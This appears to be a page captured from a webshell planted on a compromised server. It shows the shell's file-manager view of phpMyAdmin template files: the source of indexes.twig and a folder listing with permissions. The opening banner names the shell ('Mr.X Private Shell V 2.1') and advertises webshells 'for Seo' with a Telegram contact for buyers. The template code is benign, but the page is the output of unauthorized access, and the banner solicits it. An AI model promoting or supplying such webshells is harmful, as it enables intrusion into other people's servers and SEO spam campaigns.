__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<fieldset class="pma-fieldset index_info">
<legend id="index_header">
{% trans 'Indexes' %}
{{ show_mysql_docu('optimizing-database-structure') }}
</legend>
{% if indexes is not empty %}
{{ indexes_duplicates|raw }}
{{ include('modals/preview_sql_confirmation.twig') }}
<div class="table-responsive jsresponsive">
<table class="table table-striped table-hover table-sm w-auto align-middle" id="table_index">
<thead>
<tr>
<th colspan="3" class="d-print-none">{% trans 'Action' %}</th>
<th>{% trans 'Keyname' %}</th>
<th>{% trans 'Type' %}</th>
<th>{% trans 'Unique' %}</th>
<th>{% trans 'Packed' %}</th>
<th>{% trans 'Column' %}</th>
<th>{% trans 'Cardinality' %}</th>
<th>{% trans 'Collation' %}</th>
<th>{% trans 'Null' %}</th>
<th>{% trans 'Comment' %}</th>
</tr>
</thead>
{% for index in indexes %}
<tbody class="row_span">
{% set columns_count = index.getColumnCount() %}
<tr class="noclick">
<td rowspan="{{ columns_count }}" class="edit_index d-print-none ajax">
<a class="ajax" href="{{ url('/table/indexes') }}" data-post="{{ get_common(url_params|merge({'index': index.getName()}), '', false) }}">
{{ get_icon('b_edit', 'Edit'|trans) }}
</a>
</td>
<td rowspan="{{ columns_count }}" class="rename_index d-print-none ajax" >
<a class="ajax" href="{{ url('/table/indexes/rename') }}" data-post="{{ get_common(url_params|merge({'index': index.getName()}), '', false) }}">
{{ get_icon('b_rename', 'Rename'|trans) }}
</a>
</td>
<td rowspan="{{ columns_count }}" class="d-print-none">
{% if index.getName() == 'PRIMARY' %}
{% set index_params = {
'sql_query': 'ALTER TABLE ' ~ backquote(table) ~ ' DROP PRIMARY KEY;',
'message_to_show': 'The primary key has been dropped.'|trans
} %}
{% else %}
{% set index_params = {
'sql_query': 'ALTER TABLE ' ~ backquote(table) ~ ' DROP INDEX ' ~ backquote(index.getName()) ~ ';',
'message_to_show': 'Index %s has been dropped.'|trans|format(index.getName())
} %}
{% endif %}
<input type="hidden" class="drop_primary_key_index_msg" value="{{ index_params.sql_query }}">
{{ link_or_button(
url('/sql'),
url_params|merge(index_params),
get_icon('b_drop', 'Drop'|trans),
{'class': 'drop_primary_key_index_anchor ajax'}
) }}
</td>
<th rowspan="{{ columns_count }}">{{ index.getName() }}</th>
<td rowspan="{{ columns_count }}">{{ index.getType()|default(index.getChoice()) }}</td>
<td rowspan="{{ columns_count }}">{{ index.isUnique() ? 'Yes'|trans : 'No'|trans }}</td>
<td rowspan="{{ columns_count }}">{{ index.isPacked()|raw }}</td>
{% for column in index.getColumns() %}
{% if column.getSeqInIndex() > 1 %}
<tr class="noclick">
{% endif %}
<td>
{% if column.hasExpression() %}{{ column.getExpression() }}{% else %}{{ column.getName() }}{% endif %}
{% if column.getSubPart() is not empty %}
({{ column.getSubPart() }})
{% endif %}
</td>
<td>{{ column.getCardinality() }}</td>
<td>{{ column.getCollation() }}</td>
<td>{{ column.getNull(true) }}</td>
{% if column.getSeqInIndex() == 1 %}
<td rowspan="{{ columns_count }}">{{ index.getComments() }}</td>
{% endif %}
</tr>
{% endfor %}
</tbody>
{% endfor %}
</table>
</div>
{% else %}
<div class="no_indexes_defined">{{ 'No index defined!'|trans|notice }}</div>
{% endif %}
</fieldset>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| columns_definitions | Folder | 0755 |
|
|
| components | Folder | 0755 |
|
|
| config | Folder | 0755 |
|
|
| console | Folder | 0755 |
|
|
| database | Folder | 0755 |
|
|
| display | Folder | 0755 |
|
|
| encoding | Folder | 0755 |
|
|
| error | Folder | 0755 |
|
|
| export | Folder | 0755 |
|
|
| home | Folder | 0755 |
|
|
| import | Folder | 0755 |
|
|
| javascript | Folder | 0755 |
|
|
| login | Folder | 0755 |
|
|
| menu | Folder | 0755 |
|
|
| modals | Folder | 0755 |
|
|
| navigation | Folder | 0755 |
|
|
| plugins | Folder | 0755 |
|
|
| preferences | Folder | 0755 |
|
|
| relation | Folder | 0755 |
|
|
| server | Folder | 0755 |
|
|
| setup | Folder | 0755 |
|
|
| sql | Folder | 0755 |
|
|
| table | Folder | 0755 |
|
|
| test | Folder | 0755 |
|
|
| changelog.twig | File | 457 B | 0644 |
|
| create_tracking_version.twig | File | 3.7 KB | 0644 |
|
| export.twig | File | 23.07 KB | 0644 |
|
| export_modal.twig | File | 662 B | 0644 |
|
| file_select_options.twig | File | 152 B | 0644 |
|
| filter.twig | File | 433 B | 0644 |
|
| footer.twig | File | 1.55 KB | 0644 |
|
| gis_data_editor_form.twig | File | 12.18 KB | 0644 |
|
| header.twig | File | 2.26 KB | 0644 |
|
| header_location.twig | File | 652 B | 0644 |
|
| import.twig | File | 10.76 KB | 0644 |
|
| import_status.twig | File | 112 B | 0644 |
|
| indexes.twig | File | 4.19 KB | 0644 |
|
| list_navigator.twig | File | 2.29 KB | 0644 |
|
| message.twig | File | 80 B | 0644 |
|
| preview_sql.twig | File | 301 B | 0644 |
|
| recent_favorite_table_favorite.twig | File | 497 B | 0644 |
|
| recent_favorite_table_no_tables.twig | File | 187 B | 0644 |
|
| recent_favorite_table_recent.twig | File | 172 B | 0644 |
|
| scripts.twig | File | 802 B | 0644 |
|
| select_all.twig | File | 380 B | 0644 |
|
| top_menu.twig | File | 1.07 KB | 0644 |
|
| transformation_overview.twig | File | 1.31 KB | 0644 |
|
| user_password.twig | File | 83 B | 0644 |
|
| view_create.twig | File | 4.73 KB | 0644 |
|